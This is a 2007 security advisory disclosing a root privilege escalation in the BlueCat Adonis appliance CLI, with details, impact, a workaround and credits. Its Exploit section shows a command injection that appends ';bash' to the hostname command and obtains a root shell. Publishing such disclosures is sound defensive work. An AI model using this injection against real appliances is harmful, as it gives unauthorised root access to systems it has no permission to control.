TS-2007-003-0: BlueCat Networks Adonis CLI root privilege escalation

Template Security Security Advisory

  BlueCat Networks Adonis CLI root privilege escalation

  Date: 2007-08-16
  Advisory ID: TS-2007-003-0
  Vendor: BlueCat Networks, http://www.bluecatnetworks.com/   Revision: 0

Contents

  Summary
  Software Version
  Details
  Impact
  Exploit
  Workarounds
  Obtaining Patched Software
  Credits
  Revision History

Summary

  Template Security has discovered a root privilege escalation   vulnerability in the BlueCat Networks Adonis DNS/DHCP appliance   which allows the admin user to gain root privilege from the   Command Line Interface (CLI).

Software Version

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

  Adonis version 5.0.2.8 was tested.

Details

  The admin account on the Adonis DNS/DHCP appliance provides   access to a CLI that allows an administrator to perform tasks   such as setting the IP address, netmask, system time and system   hostname. By entering a certain command sequence, the   administrator is able to execute a command as root.

Impact

  Access to the admin account is the same as root access on the   appliance.

Exploit

  Here we use the 'set host-name' CLI command to execute a root   shell:

    :adonis>set host-name ;bash
    adonis.katter.org
    root@adonis:~# id
    uid=0(root) gid=0(root) groups=0(root)

Do you need more help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

  NOTE: There may be other command sequences that accomplish the   same result.

Workarounds

  Only provide admin account access to administrators that also   have root account access on the appliance.

Obtaining Patched Software

  Contact the vendor.

Credits

  forloop discovered this vulnerability while enjoying a Tuborg   Gold. forloop is a member of Template Security.

Revision History

Can we help you?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

  2007-08-16: Revision 0 released Received on Thu Aug 16 15:46:28 2007